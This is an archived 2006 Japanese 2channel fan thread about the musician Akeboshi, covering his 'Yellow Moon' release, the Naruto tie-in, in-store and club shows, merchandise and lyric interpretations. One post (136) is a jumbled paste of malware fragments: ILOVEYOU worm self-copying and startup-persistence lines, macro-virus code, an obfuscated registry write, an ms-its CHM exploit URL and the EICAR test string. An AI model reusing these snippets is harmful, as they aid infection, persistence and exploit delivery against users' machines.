5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

明星 Akeboshi 明星

1 :NO MUSIC NO NAME:2006/04/18(火) 15:15:19 ID:mbHcjJPq
4月19日にミニアルバム「Yellow Moon」発売!

公式サイト
http://www.akeboshi.com/

前スレ
http://music4.2ch.net/test/read.cgi/minor/1082302545/



2 :NO MUSIC NO NAME:2006/04/18(火) 15:39:13 ID:iPT4ThDY
2ゲト>>1乙!

今から新曲買いに行ってきますノシ

3 :NO MUSIC NO NAME:2006/04/18(火) 17:22:12 ID:B3sDWfGW
新曲聴いたよ〜!(金のナルトシール入り)「花火」切なくて良い味出してますよ!

4 :NO MUSIC NO NAME:2006/04/18(火) 20:10:49 ID:uyFpp1JF
4様!
てかスレタイに数字いれろよ!

・・・・・・まぁいいか>>1乙!

>>3
金のナルトシールテライラナス

5 :NO MUSIC NO NAME:2006/04/18(火) 20:20:12 ID:mbHcjJPq
>>4
板変わったからいれなかったんだ、スマン

6 :4:2006/04/18(火) 21:33:05 ID:ble0fwDB
>>5
おk

7 :NO MUSIC NO NAME:2006/04/18(火) 23:06:44 ID:QB2OWV6d
明日買いに行っちゃうぞ

8 :NO MUSIC NO NAME:2006/04/19(水) 12:12:21 ID:ZMlJMFzu
陽水の作詞がびたいちわからん。曲は好き

9 :NO MUSIC NO NAME:2006/04/20(木) 12:01:52 ID:BO8NQj9m
歌詞とかまだ一切見てないんだけど
1曲目だけで1日過ごせた。
鬼ほどリピートして聴いてる。すんげー好きこれ。

10 :NO MUSIC NO NAME:2006/04/21(金) 07:56:37 ID:7l5hyYWY
おいときますね。
akeboshi - hey there
ttp://www.youtube.com/watch?v=YzEp2xW1NOM&search=akeboshi
Akeboshi - Yellow Moon
ttp://www.youtube.com/watch?v=hnFRawOtGhw&search=akeboshi

埋め?しらんがな(´・ω・`)

11 :NO MUSIC NO NAME:2006/04/21(金) 15:40:42 ID:rx28+gbb
嘉男新スレおめ

12 :NO MUSIC NO NAME:2006/04/21(金) 20:26:36 ID:mrA6hMpQ
>>10
乙!

うさぎとアケボシ可愛いですな

13 :NO MUSIC NO NAME:2006/04/21(金) 21:49:15 ID:pBkBiMqs
アニソンじゃなければ買ったのに

14 :NO MUSIC NO NAME:2006/04/22(土) 00:27:05 ID:yOCyCdhE
今日買いに行ったら売り切れだった(´・ω・`)
もっと入荷しとけよ…

15 :NO MUSIC NO NAME:2006/04/22(土) 01:13:26 ID:baUip3ti
>>13
アニソンだって別に気にする必要ないと思うけど

16 :NO MUSIC NO NAME:2006/04/22(土) 06:49:58 ID:zP5at4/X
CD届いたー!Akeboshiの声(*´д`)ナルトのステッカーイラネ

ていうか「Akeboshi」で名前固定されちゃったの?「明星」も良いんだけどなぁ。
二曲目好きだ。

17 :NO MUSIC NO NAME:2006/04/22(土) 10:28:01 ID:67W8gyOg
Deep endはなんか過激なことを言ってるのかな?歌詞カードに歌詞が書いてない。

18 :NO MUSIC NO NAME:2006/04/22(土) 14:17:01 ID:mzXD1Asb
う さ ぎ テ ラ モ エ ス

19 :NO MUSIC NO NAME:2006/04/22(土) 14:39:55 ID:pAkOSxKP
皆さん知ってました??
メジャーアルバムの「Akeboshi」の13番目の曲「神様の舌打ち」って曲ありましよね?その曲を聴き終わってもそのまま切らずにかけっぱなしにしてて下さい。暫くすると(5分くらい)すると「
A Nine day's Wonder」の歌詞無しバージョンの曲などの隠しトラックが!!

20 :NO MUSIC NO NAME:2006/04/22(土) 17:38:21 ID:5GXSytl1
>>19
あれは「時の舟」という松たか子に提供した曲のアレンジ。
ちなみに「A Nine Days' Wonder」はそれをセルフカバーした曲。

21 :NO MUSIC NO NAME:2006/04/22(土) 18:42:24 ID:qo4AaBj+
シークレットトラックは正直うざいからやめてほしい

22 :NO MUSIC NO NAME:2006/04/22(土) 19:12:12 ID:Fr/nHqJl
moneyの隠しトラックがなんか良かった

隠しトラックがあるの知らずにたれ流してたら
いつまでも曲が終わらないから、あれ壊れたのかな〜と思ってしまったよw
そしたらいきなり変な曲が始まってびっくりしたww

23 :NO MUSIC NO NAME:2006/04/22(土) 19:34:22 ID:bQbcbW0b
moneyの隠しトラック??

24 :NO MUSIC NO NAME:2006/04/22(土) 20:26:59 ID:Bz/LhUac
あの宴会っぽいのじゃないか?
たぶん入ってた薄いシートの、死にそうな物ごいに金渡したら教会で仲間に酒とクスリを振る舞ってたってあたりのイメージ

25 :NO MUSIC NO NAME:2006/04/23(日) 01:17:07 ID:/hs7xMne
Akeboshiの英詞は訳して聴いてる?

26 :NO MUSIC NO NAME:2006/04/23(日) 07:36:28 ID:3+jMty4H
PV、車窓からのシーンがケミブラのStar Guitarを彷彿とさせるね

27 :NO MUSIC NO NAME:2006/04/23(日) 15:30:48 ID:L0/NaUxf
Yellow MoonのRemix配信なんてしてたのね、知らんかった。
嬉しいけどもうちょっとどうにかならんもんかね、転送機器も限られてるしCDにも焼けない。
(おれはi pod使ってないけどi podダメなんてどうかしてるだろ)
試聴にも専用プレーヤーインストールさせようとしてくるし。

28 :NO MUSIC NO NAME:2006/04/24(月) 14:00:23 ID:+9nbRNYt
チケあっさりとれた!
初めて行くんだけど、いつもそんなにあっさり取れるの?

29 :NO MUSIC NO NAME:2006/04/25(火) 19:02:22 ID:KLXNn+sP
>>28
割と…とりやすいかな?
でも今回共演がやばいから気を抜かないほうがいいかも

30 :NO MUSIC NO NAME:2006/04/25(火) 19:42:55 ID:xB7s44gq
っていうか新譜出来良いしタイアップもあるのに50位以内にすら入らなかったぞ。
あんま売れてほしくはないけどインディー時より売れないのはやばいような・・・。

31 :NO MUSIC NO NAME:2006/04/25(火) 20:46:34 ID:jEylgBQV
>>29そなんだー
グラグラ好きで、あけぼしを知って、すっごい気に入ったから、
リリースパーティーちょー楽しみ!

32 :NO MUSIC NO NAME:2006/04/25(火) 22:27:48 ID:dmDzD/Oe
ついに今週末です。良かったらアラバキスレにもどうぞ。

【荒吐】ARABAKI ROCK FEST. part4【みちのく】
ttp://music5.2ch.net/test/read.cgi/musicj/1143882656/

聴いたことないけど、なんか気になるな。

33 :NO MUSIC NO NAME:2006/04/26(水) 02:20:18 ID:Vbt3qjL6
大人気アニメのタイアプ付いても売れない明星…。

大好きだぞ。

34 :NO MUSIC NO NAME:2006/04/26(水) 02:26:15 ID:+7Zj2l0a
「Yellow Moon」はAkeboshiを好きな人じゃないと好きじゃない曲だったかもしれないな。
「花火」をタイアップにしていたらもっと売れたかもしれない。
でもそんなAkeboshiが大好きだ。

35 :NO MUSIC NO NAME:2006/04/26(水) 07:30:14 ID:O/7wDghx
Akeboshiはオリコン上位のメジャーな曲ばっか聞いてる人にはわかんない音楽なんじゃない?
とか言ってみる。

Akeboshi大好きだ。
食っていける程度に頑張ってくれー

36 :NO MUSIC NO NAME:2006/04/26(水) 23:46:29 ID:4SaRVJlG
未だにCD買えねええええw

Yellow MoonはPV見て聴けたけど、いい曲だな。歌詞は良く分からんかった。
明星の音楽は、あの独特な雰囲気がいいんだよなあ。

37 :NO MUSIC NO NAME:2006/04/29(土) 07:14:04 ID:0VFh/ohp
聞く度に好きになるよ明星

>>35
同感。
友達に声が駄目、tall boyの前奏が怖いって言われたよ… 良いところなのに(・ω・`)

38 :NO MUSIC NO NAME:2006/04/29(土) 13:11:31 ID:lB9eCLLs
>>37
そいつワカッテナイ!(;`Д´)

39 :NO MUSIC NO NAME:2006/04/29(土) 17:26:50 ID:ge7nhDcG
まあtall boyの前奏が怖いっていうのは分からなくもないが。
メジャーな曲ばかり聴いてるヤシがあれ聴くと、怖いと感じるのも無理ないと思うw

だがtall boyは綺麗な曲だ。特に中間部好き。


40 :NO MUSIC NO NAME:2006/04/29(土) 17:35:15 ID:Vyo6kcJv
最新CDは買ってないけど、UNITライブチケげと
初明星ライブ楽しみ

41 :NO MUSIC NO NAME:2006/04/29(土) 17:56:03 ID:QePWCpXc
結局オリコン何位だったの?
変なTシャツ高い。
white replyの初回版もう売ってないね。レアすぎだね。



42 :NO MUSIC NO NAME:2006/04/30(日) 23:09:02 ID:5uSWQ6zL
変なTシャツって何ぞや

43 :NO MUSIC NO NAME:2006/04/30(日) 23:49:55 ID:uuxzsImt
>>42
今回のCDに入ってた通販案内チラシのTシャツさ。
妙に高い。


44 :NO MUSIC NO NAME:2006/05/01(月) 07:10:23 ID:D2RyIPcQ
Yellow Moonのジャケ左下で傘さしてる人が

陽水に見えるww

45 :NO MUSIC NO NAME:2006/05/01(月) 20:01:23 ID:qeU9dgFm
>>43
そんなの入ってるんだ。まだCD買ってないから分からんかった。
てか家の近くの店、どこにも売ってなくてムカつくwww
ここが田舎すぎるんだか、明星の知名度が低すぎるんだかw

46 :NO MUSIC NO NAME:2006/05/02(火) 19:27:46 ID:cn/iSlW+
今回のCDもまた良かったね。0歳のうちの子は花火を聴くとスヤスヤ寝るよ。
ついでにバカにしてたが、見たら意外とナルトおもしろかったり…

47 :NO MUSIC NO NAME:2006/05/03(水) 00:45:40 ID:43RSYLy7
明星スレあったんだ…
このスレって何スレ目なの?

48 :NO MUSIC NO NAME:2006/05/03(水) 01:25:56 ID:coVj2/OW
>47
長いスレだと3スレ目かな

【インディーズ】 Akeboshi 【リバプール】 (アニソン板)
http://anime.2ch.net/test/read.cgi/asong/1033737475/
明星 akeboshi 明星(マイナー板)
http://music4.2ch.net/test/read.cgi/minor/1082302545/

ログ
ttp://makimo.to/cgi-bin/dat2html/dat2html.cgi?music4/2/asong/1033737475/
ttp://makimo.to/2ch/music4_minor/1082/1082302545.html

49 :NO MUSIC NO NAME:2006/05/03(水) 09:11:22 ID:688mAXdQ
今日、NHK-FMで今日は○○三昧って番組がアニソン特集らしい

とりあえずWindをリクエストしておいた

50 :NO MUSIC NO NAME:2006/05/03(水) 13:52:37 ID:sh/KATvP
GJ!
と思ったが、なんでYellow Moonじゃないんだよw

51 :NO MUSIC NO NAME:2006/05/03(水) 15:45:32 ID:688mAXdQ
あ、確かにYellow Moonの方が良かったね

52 :NO MUSIC NO NAME:2006/05/03(水) 15:48:45 ID:688mAXdQ
うち、ラジオないから誰かAkeboshiの曲がかかってるのをきいたら教えて下さい

53 :NO MUSIC NO NAME:2006/05/04(木) 19:45:53 ID:DkSttD5s
ナルトヲタにはあの曲は受け付けないようだな

54 :NO MUSIC NO NAME:2006/05/04(木) 21:50:36 ID:isVQOarR
いいじゃん、変にヲタ厨が増えるよりは。

55 :NO MUSIC NO NAME:2006/05/04(木) 21:59:28 ID:xH+VwoTM
Windの時はチャンネル
回してたらたまたまながれてて一発でやられたが
今回はちょっとインパクトにかけるのかな…
ナルトヲタにはだめでも
普通の音楽好きなら反応してもよさそうだけど
いい曲なんだけどな〜



56 :NO MUSIC NO NAME:2006/05/04(木) 23:09:49 ID:qnu1QOnK
Windの時はナルトが一番面白かった時だったしなぁ。

今は本編も劣化してるし…。
今回もEDの映像は歌詞に合わせてくれたんだろうけど
忍者漫画で携帯はなぁ…。

57 :NO MUSIC NO NAME:2006/05/05(金) 01:51:27 ID:pHmGNRAf
WindEDは、映像もずいぶん曲の良さを引き出してたからな。
アニソンらしからぬ美しさだった。
Yellow Moonからの新規ファンはいるのだろうか。
このスレを見る限りでは(ry

ナルトステッカーを付けたんだから、ナルトヲタに受けなきゃ意味ない気がするのだがw

58 :NO MUSIC NO NAME:2006/05/05(金) 02:27:21 ID:4N4kYDaR
Yellow Moon曲的には最高だと思うお

59 :NO MUSIC NO NAME:2006/05/05(金) 02:52:43 ID:2N3kJslm
WINDは曲的に起・承・転・結があったから、EDの出来ともあいまって良さが分かりやすい
黄色月は起・承・承・承みたいな感じ(ED部分では)実際フルでも起・承・承・大承・結見たいな曲だしね
あくまで印象だけど

60 :NO MUSIC NO NAME:2006/05/05(金) 12:38:43 ID:pHmGNRAf
そういえば明星の曲は起・承・転・結はっきりしてないの多いかもな


61 :NO MUSIC NO NAME:2006/05/06(土) 00:10:20 ID:gznDDVWi
いい意味で投げっぱなしって感じがする
聴いてる側の解釈というか想像力を掻き立てるというか…妄想力かも知らんがw
それこそ10人いたら10通りの解釈がありそうで、そういう雰囲気が
個人的にすごい好きなんだけどね

62 :NO MUSIC NO NAME:2006/05/06(土) 10:37:28 ID:NyVVy3GF
one step behind the doorのイントロがakeboshiらしくて
すき。あとまだ全部訳せてないけどwriting over the sign
のかしもいい。

63 :NO MUSIC NO NAME:2006/05/06(土) 19:26:47 ID:5kT1oaZ2
one step behind the doorは、久々に笛が大活躍してるな

歌詞カードの絵を見てるといろいろ見つけて楽しいな。
馬にフォーク刺さってるの見て噴いたw

>>46
人間て小さい時に聴いた曲想を好きになるらしいから
0歳から聴かせてたら、間違いなく明星好きになるなw

64 :NO MUSIC NO NAME:2006/05/06(土) 20:00:36 ID:j0deCk2r
最近CMで松たか子の時の船をよく聞くけど
akeboshiのを聞いた後だと物足りない感じ。
ドラマで聞いてたときはそれなりに好きだったのに。

65 :NO MUSIC NO NAME:2006/05/06(土) 22:20:06 ID:Bm6efPki
46です。
>>63
明星を聴いて心地よく眠ってくれてるからもう好きなんだろうね。これで親子でファンできるよ。
 
そして馬の尻フォークに同じく噴いたw

66 :NO MUSIC NO NAME:2006/05/07(日) 23:36:22 ID:zY8Qs1MQ
で、結局このスレの住人で28日のライブに行く人はどれだけいるのかな?
私はモチ行くけど。

67 :NO MUSIC NO NAME:2006/05/08(月) 00:04:12 ID:G04Bwakl
行きます!たいばんも楽しみ

68 :NO MUSIC NO NAME:2006/05/08(月) 10:16:47 ID:gpAL9v1R
同じく。対バンドがブラフマンの人と聞いて、参加する友人もいるがW
先行チケはいつ発送されるだっけ?

69 :NO MUSIC NO NAME:2006/05/08(月) 10:50:41 ID:/k1uDIkO
|・ω・`) コソーリ

アニヲタも行っていいデスカ?

70 :NO MUSIC NO NAME:2006/05/08(月) 12:35:12 ID:mDfmwx37
28日のライブ、行きたいけど、仕事でいけない。・゚・(ノ∀`)・゚・。



アメリカに住んでたことがあるって先輩に「One step behind the door」ってどういう意味かって尋ねてみたら
「その扉の向こう側には」みたいな意味らしい

71 :NO MUSIC NO NAME:2006/05/09(火) 00:03:21 ID:KTlhwace
behind the doorのTシャツ、買うべきなんだろうか…。

72 :NO MUSIC NO NAME:2006/05/09(火) 05:20:20 ID:hw5dWnrQ
CDについてた紙なくしたんだがTシャツ買えないだろうか…

73 :NO MUSIC NO NAME:2006/05/09(火) 08:45:23 ID:h2RI/G+R
Tシャツ洗うと消えそうな悪寒

74 :NO MUSIC NO NAME:2006/05/10(水) 23:06:56 ID:KvOFzgcv
ブログにデザイン載ってるね>Tシャツ
カラーで見ると意外とイイ…買おうかな

75 :NO MUSIC NO NAME:2006/05/12(金) 14:55:49 ID:3QNj3GWv
Yellow MoonTシャツも良いですな

76 :NO MUSIC NO NAME:2006/05/13(土) 12:08:47 ID:78tmmoh1
21日のサイン会いくどー

77 :NO MUSIC NO NAME:2006/05/14(日) 00:39:07 ID:kaUIaib7
Tシャツ欲しい〜 画像保存しちゃったよ。5/28発売だとかの方。

78 :NO MUSIC NO NAME:2006/05/19(金) 10:10:54 ID:fSDGHZWw
>>76
21日のサイン会って何?

79 :NO MUSIC NO NAME:2006/05/19(金) 18:25:13 ID:lz15d/g7
>>78
新宿タワレコでyellow moonを買った客にサイン会参加券が配られた。
この参加権は既に店頭からは無くなったけど、ミニライブは普通に見られるんじゃない?


↓公式から転載

ミニアルバム『Yellow Moon』の発売を記念してインストアライブ決定!! (2006.4.17)
いよいよ今週ミニアルバム『Yellow Moon』を発売するAkeboshiの都内での
インストアライブが決定しました。

日時:2006年5月21日(日)14:00〜
場所:タワーレコード新宿店 7Fイベントスペース
内容:ミニライブ&サイン会

   タワーレコード新宿店にて、4月19日発売Akeboshi『Yellow Moon』を
   ご購入頂いたお客様に先着でサイン会参加券を差し上げます。
   イベント当日、ご購入頂いたCDとサイン会参加券をお持ちのお客様には、本人より
   ブックレットに1箇所サインを致します。

※イベント当日はご購入頂いたCDをお持ち下さい。
※サイン会参加券はなくなり次第、配布終了となります。ご了承下さい。
※イベントはフリーでご覧頂けます。

*サイン会参加券1枚につきお一人様1箇所のサインとさせて頂きますので予めご了承下さい。
*アーティストの都合により内容等変更させて頂く場合がございます。
*イベント当日の録音、録画等は一切禁止とさせて頂きます。
*サイン会参加券はイベント当日のみ有効です。
*サイン会参加券の盗難、紛失等に伴う再発行は致しません。

80 :NO MUSIC NO NAME:2006/05/20(土) 19:10:15 ID:NXXDFkJy
>>79
トンクス!明日休みなんで、行ってみるよ。

81 :NO MUSIC NO NAME:2006/05/20(土) 21:18:36 ID:0VWhG12e
絶対行く!

82 :NO MUSIC NO NAME:2006/05/21(日) 11:32:03 ID:5yC6em5P
行く予定だったのに仕事の急用が入った(;ω;)
せっかくサイン券も持ってるというのに。
みんな、おいらの分まで愉しんできてくれ

83 :NO MUSIC NO NAME:2006/05/21(日) 15:08:55 ID:PYJqhZOD
行ってきたよ。10分前に着いたら、公開リハ(?)でYellow Moon やってたorz
6曲位やった。
当日でもCD購入でサイン貰えたから、売り切れなかったと思われW
ヒゲぼーでした。

84 :NO MUSIC NO NAME:2006/05/21(日) 15:39:19 ID:/oN2FHYN
>>82
カワイソス

>>83


>公開リハ(?)でYellow Moon やってたorz
なんで「orz」なんだ?

85 :NO MUSIC NO NAME:2006/05/21(日) 16:03:15 ID:VQf0KyGH
結構人居たね。先週のSANTARAより多かった感じ。
パーカッションの朝倉さんはSANTARAに続き連投です。

1. Wind(?)
2. (?)
3. tall boy
4. Hey There
5. Yellow Moon
6. One step behind the door

だったかな。最後の曲はリハ無しぶっつけとか。

86 :NO MUSIC NO NAME:2006/05/21(日) 16:40:21 ID:8J52OdWC
足りない曲はmorning highかな?
なんかいつもリハびっちりやる人だからステージ2回まわしみたいな気分になる。そこが好きなんだけどね
リハ途中でスタッフさんに「もう本番、時間です」ってとめられて「じゃ、今のやつ(リハ)本番で。ありがとうございました。」って言ってたのが笑いを誘っていたよ。
音はフィドルないと寂しく感じたです。

87 :NO MUSIC NO NAME:2006/05/21(日) 19:09:32 ID:5yC6em5P
ウラヤマシス・・・
でも28日のライブは絶対に逝きます(`・ω・´)

88 :NO MUSIC NO NAME:2006/05/21(日) 23:35:22 ID:8uyxZ9fp
>>85-86
レポ乙です
こんな時遠隔地に住んでるのが辛いなあ…
みなさん、28日のライヴ楽しんできてくださいヽ(・∀・)ノ

89 :NO MUSIC NO NAME:2006/05/22(月) 00:07:35 ID:56ySwst7
行きたかった…
レポ乙、6曲もやったんだ…

90 :NO MUSIC NO NAME:2006/05/22(月) 19:47:39 ID:SnOIYWyi
>>88
私も同じく。
 
28日に行ける皆さんは楽しんできて下さいね。
レポ待ってます。

91 :NO MUSIC NO NAME:2006/05/25(木) 22:16:04 ID:e25ktF8z
なんか〜めんどうで〜〜♪

92 :NO MUSIC NO NAME:2006/05/27(土) 10:15:06 ID:qpFPA7dr
盗んだモータバーイク♪

93 :NO MUSIC NO NAME:2006/05/27(土) 20:07:00 ID:KJUQ8jBU
15の夜〜〜♪

94 :NO MUSIC NO NAME:2006/05/27(土) 22:32:34 ID:nQDjcSiw
NARUTOのEDに起用されたWINDが好きです。
初めて英語の歌詞の歌を好きになりました

95 :NO MUSIC NO NAME:2006/05/28(日) 00:32:31 ID:k5WzCx0z
>>94
ぜひライブに行く事をお勧めします。生歌聞いた方が絶対良いよ。
もし行けるなら、明日の代官山のライブにおいでませ。楽しみだなぁ。

96 :NO MUSIC NO NAME:2006/05/28(日) 11:22:09 ID:diYWp077
今日のライブ行きたかった…
(´・ω・`)
行く人レポお願い致します

97 :NO MUSIC NO NAME:2006/05/29(月) 23:56:13 ID:qEmCPusi
昨日のUNIT行ってきました!…3時間半立ちっぱなしで
しんどかったですが やっぱ良かったです!お客様さんたくさんで 嬉しいような 寂しいような…。しかさ トークが重い…

98 :NO MUSIC NO NAME:2006/05/30(火) 00:20:24 ID:tkGqeJie
>>97

トークを中心にレポを詳しくお願いします。

99 :NO MUSIC NO NAME:2006/05/30(火) 00:32:24 ID:llsbnT6L
>>97
おっつ!
トークkwsk!

100 :NO MUSIC NO NAME:2006/05/30(火) 17:29:08 ID:llsbnT6L
ヾ(o゚ω゚o)ノ゙ 100ゲトズザー
\/. \/


101 :NO MUSIC NO NAME:2006/06/01(木) 00:09:27 ID:uwAY7S2R
年内にもう一枚シングルを出すらしいってさ!

102 :NO MUSIC NO NAME:2006/06/04(日) 14:25:17 ID:x5X40BOX
ライブ行った方、White replyだかWriting over the signの制作秘話みたいなのがあったなら詳しく教えて頂けませんか?


PerunaについてAkeboshiが何かいってたならそれも詳しく教えて頂けませんか?

103 :NO MUSIC NO NAME:2006/06/04(日) 17:48:59 ID:Qw+FTHn0
White〜の方は
留学時代治安の悪い地帯で暮らしていて、日本からもらった友人の平和な
内容の手紙に憤りを感じて白紙の返事を出したっていうエピソドから。
Writhig〜は
周りから早く曲作れってせっつかれて怒って書いた曲w
らしい。

重いとーくはOne step〜の
むこうで出会った亡命か戦争かの選択を迫られてた
17歳のイスラエルの少年の話かな?

Perunaはやらなかったから触れてなかったよ。意味はジャガイモ。


104 :NO MUSIC NO NAME:2006/06/04(日) 17:51:55 ID:Qw+FTHn0
×Writhig
○Writing ね。スペルまちぇがたorz

105 :NO MUSIC NO NAME:2006/06/05(月) 18:34:26 ID:MHfKh5Xd
>103
サンクス!

106 :NO MUSIC NO NAME:2006/06/05(月) 20:59:26 ID:nTiPFt2F
どーんくらーい

107 :NO MUSIC NO NAME:2006/06/05(月) 22:14:56 ID:O9GxELMX
新曲早く欲しいな。Perunaがやたら好き。

108 :NO MUSIC NO NAME:2006/06/06(火) 22:48:27 ID:y0X3Ootq
yellow moonに入ってたTシャツのチラシ失くしてしまった…orz
ググってもわからないのでもしよければ誰かうpしてくれませんか…?

109 :NO MUSIC NO NAME:2006/06/09(金) 18:54:40 ID:YHaRB/Xa
>>108
デザインが知りたいの?

110 :NO MUSIC NO NAME:2006/06/11(日) 03:54:00 ID:LttcejbO
THEソニー仕様

一、詞曲が書けても作詞家作曲家をあてがわれる
一、とりあえずアニメタイアップ
一、HPをソニー仕様に改悪
一、その内、カバー曲やらされる

111 :NO MUSIC NO NAME:2006/06/11(日) 03:58:58 ID:D2fra+Jd
とても糞な仕様ですね
さすがだぜ

112 :NO MUSIC NO NAME:2006/06/12(月) 13:08:41 ID:GovzwPtr
ageます。
BSデジタル放送でどこの局か分からないのですが、Akeboshiが出る(出た?)ようなのですが、どの局でいつの放送か教えてください。

113 :NO MUSIC NO NAME:2006/06/12(月) 13:30:54 ID:o/4VP0lz
BS-iで水曜日の夜だよ。

114 :NO MUSIC NO NAME:2006/06/13(火) 14:40:12 ID:q8q5NI/y
>>113
本当にありがとうございました。


115 :NO MUSIC NO NAME:2006/06/14(水) 02:39:28 ID:Zw9toKsi
music tideに出るのか
スレチェックしてなかったらきづかなかった

116 :NO MUSIC NO NAME:2006/06/15(木) 05:51:58 ID:546VFL7b
保守

117 :NO MUSIC NO NAME:2006/06/15(木) 06:52:44 ID:T/1CZut9
雨の日にAkeboshiを聞くのが好きな自分ガイル。

118 :NO MUSIC NO NAME:2006/06/18(日) 01:00:37 ID:3UkkCVga
ttp://www.musictide.com/

akeboshiいんたびゅ

でら男前akeboshi!!


119 :NO MUSIC NO NAME:2006/06/20(火) 20:35:49 ID:UzSNbuDS
聞く音楽ほぼ8割akeboshiという生活です。
雨の日も晴れの日も落ち込んだ日も嬉しい日も全部カバーしてくれるのだ。

京都〜大阪でやったカフェライブみたいなの、またやってくれないかなあ。
少人数で、すごく落ち着いた雰囲気で、
なおかつお話まで出来てしまうという最高なライブだったんだが・・・
サインも頂きました。でも緊張しすぎて殆ど喋れなかったYO!

120 :NO MUSIC NO NAME:2006/06/21(水) 02:27:23 ID:bgN/nw2F
ジャケットが気に入って買ったら大当たり
一日中聞いてます

121 :NO MUSIC NO NAME:2006/06/21(水) 02:30:13 ID:bgN/nw2F
>>118
声がキャイーンの天野に似てる

122 :NO MUSIC NO NAME:2006/06/22(木) 00:44:31 ID:awI5njMa
花火の女の子って親に虐待されてんの??

123 :NO MUSIC NO NAME:2006/06/23(金) 23:11:35 ID:OGGt7Olq
何かのインタビューでそれっぽい内容だと言ってたよ>花火
性別は明確になってないと思う
まあ、自分の好きなように解釈すればいいんじゃないかな


124 :NO MUSIC NO NAME:2006/06/28(水) 01:37:16 ID:j/hXpU+Z
花火ってそんな内容だったのか

125 :NO MUSIC NO NAME:2006/06/28(水) 01:44:36 ID:jd9ayfWr
>>124
誰にもいえない君の秘密
とか
いつも頬っぺたに傷云々
って言うのからそんな雰囲気が漂っていると思います。

126 :NO MUSIC NO NAME:2006/06/28(水) 20:32:45 ID:yOSys/WR
気まぐれなヒステリーとか
ほつれたぬいぐるみもそんな雰囲気だな。

そう思って聴いたら、すごい悲しい歌に聴こえた・・・

127 :NO MUSIC NO NAME:2006/06/28(水) 23:47:57 ID:OO1m1cBt
>>126
でも最後、幸せになったっぽいのが
せめてもの救いですね

128 :NO MUSIC NO NAME:2006/06/29(木) 16:33:44 ID:qfHUagNW
>>122だけど、>>123ありがとう

そういえば歌詞のどこにも女の子書いてないね。
自分の中のイメージで自然と女の子で描かれてたから普通に言っちゃったよ

129 :NO MUSIC NO NAME :2006/06/29(木) 21:05:37 ID:o9sUXjDj
>>125
おれもそこきになた。

涙を浮かべて僕を見た。

130 :NO MUSIC NO NAME:2006/06/29(木) 21:51:24 ID:PjbLh9jo
CDでーたのインタビューで花火は家庭内暴力をテーマにしているって書いてあったよ

131 :NO MUSIC NO NAME:2006/06/29(木) 22:20:28 ID:4wISV8ZT
>130
そうなんですか!?

うわぁ…
そのインタビュー見たかった

132 :NO MUSIC NO NAME:2006/07/01(土) 23:06:18 ID:SfB/Edoa
明星の歌詞は毎回切ねー。

133 :NO MUSIC NO NAME:2006/07/02(日) 12:57:10 ID:uWVSmOKu
昨日、誕生日だったんだね…
おめでとう。

134 :NO MUSIC NO NAME:2006/07/02(日) 14:45:13 ID:MN8ctiZY
あ、そうなんだ、誕生日おめでとう。
しかし、応援してたであろうイングランドが…。残念!

135 :NO MUSIC NO NAME:2006/07/03(月) 06:45:03 ID:mjc/xjLE
昨日誕生日でしたっけ?

忘れてた…


Akeboshiさんお誕生日おめでとうございました


ここでいっても無意味だろうが…^^;

136 :NO MUSIC NO NAME:2006/07/03(月) 20:44:22 ID:dO3Xzzzc
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

137 :NO MUSIC NO NAME:2006/07/06(木) 21:35:32 ID:OtyQYP9d
ナルトで知ってCD買ってみたけどかなりイイ!


138 :NO MUSIC NO NAME:2006/07/12(水) 21:14:30 ID:f9g6Ip3K
akeboshi age

139 :NO MUSIC NO NAME:2006/07/15(土) 21:55:54 ID:ImnYkGjF
相変わらず癒し系なブログだな

140 :NO MUSIC NO NAME:2006/07/16(日) 01:46:49 ID:BQqh8uIP
さっき家の中にブログにアップされてたような小さいカエルが現れた…@田舎

141 :NO MUSIC NO NAME:2006/07/18(火) 20:40:50 ID:pwMP6Prs
昨日か一昨日のブログ消されたね。

142 :NO MUSIC NO NAME:2006/07/18(火) 21:54:30 ID:7xY+YMZM
でもああいう事を書くのはちょっとどうかと思ったよ
あれ読んじゃったらそのライブ行っても嫌々出てるのかなとか考えちゃって、素直に楽しめない気がするしさ…

143 :NO MUSIC NO NAME:2006/07/18(火) 22:22:33 ID:h5w/an+b
自分も発熱した・・・明星大丈夫かな?

>>141-142
何が書かれてたんですか?

144 :NO MUSIC NO NAME:2006/07/20(木) 19:00:10 ID:OKnmv25S
こないだTシャツ届いた。柄は良かったけどデカイ・・・。

145 :NO MUSIC NO NAME:2006/07/20(木) 19:20:50 ID:tMVoyro8
みんな松たか子のwhite reply 聞いたことある?

物足りなさMAX

146 :NO MUSIC NO NAME:2006/07/20(木) 19:24:08 ID:tMVoyro8
Tシャツの送金手数料ってサイト見たんだけど一万円未満は70円って書いてるのに<記入例>には700円になってる
700円が送金手数料?

